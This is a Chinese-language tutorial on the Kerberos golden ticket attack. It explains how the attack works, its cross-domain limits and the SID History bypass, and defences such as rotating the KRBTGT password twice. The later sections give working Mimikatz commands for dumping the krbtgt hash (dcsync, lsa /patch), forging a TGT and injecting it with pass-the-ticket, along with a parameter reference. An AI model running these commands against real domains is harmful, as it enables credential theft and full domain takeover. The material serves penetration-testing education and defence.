Kerberos的黄金票据详解

0x01黄金票据的原理和条件

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。如下图所示，与域控制器没有AS-REQ或AS-REP（步骤1和2）通信。由于黄金票据是伪造的TGT，它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

黄金票据的条件要求：
1.域名称[AD PowerShell模块：（Get-ADDomain）.DNSRoot]
2.域的SID 值[AD PowerShell模块：（Get-ADDomain）.DomainSID.Value]
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名

一旦攻击者拥有管理员访问域控制器的权限，就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

0x02黄金票据局限性

黄金票据 “欺骗”了当前域的管理权限，当KRBTGT帐户密码哈希显示在作为多域AD的林一部分的子域中时存在此局限性。因为是根（root）域包含全森林管理组Enterprise Admins。由于Mimikatz通过相对标识符（RID）向票据添加了组成员资格，因此Kerberos票据中的519（企业管理）RID在其创建的域中（基于KRBTGT帐户域）被标识为本地。如果通过获取域SID和附加RID创建的域安全标识符（SID）不存在，那么Kerberos票据的持有者不会收到该级别的访问权限。换句话说，在一个多域AD森林中，如果创建的Golden
Ticket域不包含Enterprise Admins组，则Golden
Ticket不会向林中的其他域提供管理权限。在单个域Active Directory林中，由于Enterprise Admins组驻留在此域中，这时创建Golden Ticket不存在局限性。

如下图所示：除非在Enterprise Admins中，否则黄金票据不能跨域信任使用，。标准的黄金票据仅限于其创建的子域

0x03绕过黄金票据局限性

在迁移方案中，从DomainA迁移到DomainB的用户将原始DomainA用户SID值添加到新的DomainB的
SID History属性中。当用户使用新帐户登录DomainB时，DomainA SID将与确定访问的DomainB用户组一起验证。这意味着可以将SID添加到SID历史记录以扩展访问。

一旦Mimikatz支持Golden Ticket（和Silver Tickets）中的SID History，事情会变得更加有趣，因为AD Forest中的任何组都可以被包含并用于授权访问。使用最新版本的Mimikatz，我们现在可以将SID历史记录添加到Forest Enterprise Admins组的Golden Ticket中。一旦单个域名的KRBTGT帐户密码哈希被获取到，通过黄金票据可伪造用户登录到整个森林中。 总而言之，一旦一个域名受到威胁。黄金门票现在可以用来微机AD森林中的任何域

注意：在Active Directory林中的信任之间启用SID筛选可以防止绕过黄金票据局限性。

0x04黄金票据的特点

1.域控制器中的KDC服务不验证TGT中的用户帐户，直到TGT超过20分钟，这意味着攻击者可以使用禁用和删除的帐户，甚至是在Active Directory中不存在的虚拟帐户。

微软的MS-KILE解释：

Kerberos V5不提供对TGS请求的帐户撤销检查，只要TGT有效，即使该帐户已被删除，TGT更新和服务票据也可以发布。KILE提供了一个可以将利用时间限制在较短的时间内（20分内）。当TGT大于20分钟时，KILE KDC需要在域中检查账户。

2.由于在域控制器上由KDC服务生成的域设置了Kerberos策略，如果提供票据，则系统信任票据的有效性。这意味着，即使域策略声明Kerberos登录票据（TGT）只有10小时有效，如果票据声明有效期为10 年，那么也会信任票据的有效性期为10年。

3.该KRBTGT帐户密码从不更改*和直到KRBTGT密码被更改（两次），攻击者可以创建黄金票据。请注意，即使伪造用户更改其密码，创建用于模拟用户的Golden Ticket仍然存在。

4.它绕过了SmartCard身份验证要求，因为它绕过了DC在创建TGT之前执行的常规验证。

5.这个精心创建的TGT要求攻击者拥有Active Directory域的KRBTGT密码哈希值（通常从域控制器转储）。

6.KRBTGT NTLM哈希可用于生成一个有效的TGT（使用RC4）模拟任何用户访问Active Directory中的任何资源。

7.在主机上都可以生成和使用黄金票据（TGT），即使没有加入域也是如此。只要网络可以访问域。

8.用于从AD森林中的DC获取有效的TGS票据，并提供一个坚持在一切域访问所有的主机的好办法。

0x05黄金票据防御

1.限制域管理员登录到除域控制器和少数管理服务器以外的任何其他计算机（不要让其他管理员登录到这些服务器）将所有其他权限委派给自定义管理员组。这大大降低了攻击者访问域控制器的Active
Directory的ntds.dit。如果攻击者无法访问AD数据库（ntds.dit文件），则无法获取到KRBTGT帐户密码。

2. 禁用KRBTGT帐户，并保存当前的密码以及以前的密码。KRBTGT密码哈希用于在Kerberos票据上签署PAC并对TGT（身份验证票据）进行加密。如果使用不同的密钥（密码）对证书进行签名和加密，则DC（KDC）通过检查KRBTGT以前的密码来验证。

3.建议定期更改KRBTGT密码（毕竟这是一个管理员帐户）。更改一次，然后让AD备份，并在12到24小时后再次更改它。这个过程应该对系统环境没有影响。这个过程应该是确保KRBTGT密码每年至少更改一次的标准方法。

4.一旦攻击者获得了KRBTGT帐号密码哈希的访问权限，就可以随意创建黄金票据。通过快速更改KRBTGT密码两次，使任何现有的黄金票据（以及所有活动的Kerberos票据）失效。这将使所有Kerberos票据无效，并消除攻击者使用其KRBTGT创建有效金票的能力。

0x06使用Mimikatz伪造Kerberos黄金票据

Mimikatz命令：Kerberos：Golden用于创建“黄金票据”（伪造TGT身份验证票证）
Mimikatz命令示例：
kerberos::golden /admin:ADMIINACCOUNTNAME
/domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

kerberos::golden /admin:darthvader /domain:lab.adsercurity.org /id:2601 /sid: S-1-5-21-4155807533-921486164-2767329826 /krbtgt:8a2f1adcdd519a23515780021d2d178a
/ptt

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出：

mimikatz log "lsadump::dcsync
/domain:test.local /user:krbtgt"

找到如下信息：

/domain：test.local

/sid:S-1-5-21-4155807533-921486164-2767329826

/aes256:af71a24ea463446f9b4c645e1bfe1e0f1c70c7d785df10acf008106a055e682f

2、生成Golden
Ticket

伪造的用户设置为god,执行:

mimikatz "kerberos::golden
/domain:test.local /sid:S-1-5-21-4155807533-921486164-2767329826

/aes256:af71a24ea463446f9b4c645e1bfe1e0f1c70c7d785df10acf008106a055e682f
/user:god

/ticket:gold.kirbi"

生成文件gold.kirbi

3、伪造Golden
Ticket获得域控权限

导入Golden Ticket，执行如下命令：

kerberos::ptt c:\test\gold.kirbi

如图，成功获得域控权限

Tips:

生成Golden Ticket不仅可以使用aes256，也可用krbtgt的NTLM
hash
可以用mimikatz "lsadump::lsa /patch"导出:

0x07
Mimikatz黄金票据命令参考：

Mimikatz创建黄金的命令是“kerberos ::
golden”

/domain -----完整的域名，在这个例子中：“lab.adsecurity.org”

/ sid ----域的SID,在这个例子中：“S-1-5-21-1473643419-774954089-2222329127”

/ sids --- AD森林中账户/组的额外SID，凭证拥有权限进行欺骗。通常这将是根域Enterprise Admins组的“S-1-5-21-1473643419-774954089-5872329127-519”值。Ť

/ user ---伪造的用户名

/ groups（可选）---用户所属的组RID（第一组是主组）。添加用户或计算机帐户RID以接收相同的访问权限。默认组：513,512,520,518,519为默认的管理员组。

/ krbtgt---域KDC服务帐户（KRBTGT）的NTLM密码哈希值。用于加密和签署TGT。

/ ticket（可选） - 提供一个路径和名称，用于保存Golden Ticket文件以便日后使用或使用/ ptt立即将黄金票据插入内存以供使用。

/ ptt - 作为/ ticket的替代品 - 使用它来立即将伪造的票据插入到内存中以供使用。

/ id（可选） - 用户RID。Mimikatz默认值是500（默认管理员帐户RID）。

/ startoffset（可选） - 票据可用时的起始偏移量（如果使用此选项，通常设置为-10或0）。Mimikatz默认值是0。

/ endin（可选） - 票据使用时间范围。Mimikatz默认值是10年（〜5,262,480分钟）。Active
Directory默认Kerberos策略设置为10小时（600分钟）。

/ renewmax（可选） - 续订最长票据有效期。Mimikatz默认值是10年（〜5,262,480分钟）。Active Directory默认Kerberos策略设置为7天（10,080分钟）。

/ sids（可选） - 设置为AD林中企业管理员组（ADRootDomainSID）-519）的SID，以欺骗整个AD林（AD林中每个域中的AD管理员）的企业管理权限。

/ aes128 - AES128密钥

/ aes256 - AES256密钥

黄金票默认组：

域用户SID：S-1-5-21
<DOMAINID> -513

域管理员SID：S-1-5-21
<DOMAINID> -512

架构管理员SID：S-1-5-21
<DOMAINID> -518

企业管理员SID：S-1-5-21
<DOMAINID> -519（只有在森林根域中创建伪造票证时才有效，但为AD森林管理员权限添加使用/ sids参数）

组策略创建者所有者SID：S-1-5-21
<DOMAINID> -520

命令格式如下：

kerberos :: golden / user：ADMIINACCOUNTNAME /
domain：DOMAINFQDN / id：ACCOUNTRID
/ sid：DOMAINSID / krbtgt：KRBTGTPASSWORDHASH
/ ptt

命令示例：

.\mimikatz “kerberos::golden
/user:DarthVader /domain:rd.lab.adsecurity.org /id:500 /sid:S-1-5-21-135380161-102191138-581311202
/krbtgt:13026055d01f235d67634e109da03321
/ptt” exit